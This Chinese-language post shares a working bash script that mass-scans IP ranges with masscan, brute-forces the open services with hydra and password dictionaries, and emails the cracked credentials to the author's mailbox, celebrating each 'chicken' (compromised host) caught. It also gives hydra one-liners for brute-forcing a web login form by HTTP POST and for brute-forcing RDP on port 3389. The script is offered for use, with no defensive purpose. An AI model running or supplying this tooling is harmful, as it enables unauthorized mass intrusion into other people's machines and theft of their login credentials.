自己写的脚本,指定好参数后,massscan自动扫描开放端口的ip地址并保存,然后hydra批量字典破解,破解完后将结果文件打包发送邮件到指定邮箱

<br />

#!/bin/bash

Title=""
Message="Over"


target_scan="targets/scan"
target_rslt="targets/rslt"
ip=${1}
port=${2}
server=${3}
user_dic=${4}
pass_dic=${5}

mail="**你的邮箱地址@qq.com"
scan_name=${ip%/*}"_"${port}".scan"
rslt_name=${ip%/*}"_"${port}".rslt"

if [ ! -d "targets" ]
then
    mkdir "targets"
fi

if [ ! -d ${target_scan}"/"${port} ]
then
    if [ ! -d ${target_scan} ]
    then
        mkdir ${target_scan}
    fi
    mkdir ${target_scan}"/"${port}
fi

if [ ! -d ${target_rslt}"/"${port} ]
then
        if [ ! -d ${target_rslt} ]
        then
                mkdir ${target_rslt}
        fi
    mkdir ${target_rslt}"/"${port}
fi

Scan="masscan -p "${port}" --range "${ip}" -oL "${target_scan}"/"${port}"/"${scan_name}
Burp="hydra "${server}"  -M "${target_scan}"/"${port}"/"${scan_name}".ip -L "${user_dic}" -P "${pass_dic}" -V -o "${target_rslt}"/"${port}"/"${rslt_name}

echo "Start scanning:"
echo ${Scan}
${Scan}

declare -i s_count
s_count=`cat ${target_scan}"/"${port}"/"${scan_name} |grep -c -v "#"`

if [ $s_count == 0 ]
then
    Title=${ip}":"${port}"无端口开放"
    Message="Failed"
    echo ${Message}" "${Title}
    echo ${Message} | mutt -s ${Title} ${mail}
    exit -1
else
    if [ ! -d ${target_rslt}"/"${port} ]
    then
            mkdir ${target_rslt}"/"${port}
    fi

    echo "Dealing....."
    cat ${target_scan}"/"${port}"/"${scan_name} | grep "open" | awk {'print $4'} | awk  {'print $1'} > ${target_scan}"/"${port}"/"${scan_name}".ip"
    echo "Burping:"
    echo ${Burp}
    ${Burp}
    if [ ! -f ${target_rslt}"/"${port}"/"${rslt_name} ]
    then
        Title=${ip}":"${port}"爆破失败"
        Message="扫到"${s_count}"个,一个都没能破解"
            echo ${Message}" "${Title}
            echo ${Message} | mutt -s ${Title} `echo ${mail}`
        exit -1
    else
        declare -i c_count
        c_count=0
        echo ${Title}
        c_count=`cat ${target_rslt}"/"${port}"/"${rslt_name} |grep -c -v "#"`
        if [ ${c_count} != 0 ]
        then
            Title=${ip}":"${port}"抓鸡成功!"
            else
            Title=${ip}":"${port}"没抓到鸡!"
        fi
        Message="扫描:"${s_count}"  抓到:"${c_count}"只鸡!"
        echo ${Message}" "${Title}
            echo ${Message} | mutt -s ${Title} ${mail} -a ${target_rslt}"/"${port}"/"${rslt_name}
        exit 0
    fi
fi

post方式提交,破解web登录:

<br />

hydra -l admin -P pass.lst -o ok.lst -t 1 -f 127.0.0.1 http-post-form “index.php:name=^USER^&pwd=^PASS^:F=<title>invalido</title>:H=Cookie:.....”
<form action="index.php" method="POST">
<input type="text" name="name" /><BR><br>
<input type="password" name="pwd" /><br><br>
<input type="submit" name="sub" value="提交">
</form>

说明:破解的用户名是admin,密码字典是pass.lst,破解结果保存在ok.lst,-t 是同时线程数为1,-f 是当破解了一个密码就停止,ip 是本地,就是目标ip,http-post-form表示破解是采用http 的post 方式提交的表单密码破解。

后面参数是网页中对应的表单字段的name 属性,后面<title>中的内容是表示错误猜解的返回信息提示,可以自定义。

3389扫爆:

hydra ip rdp -l administrator -P pass.txt -V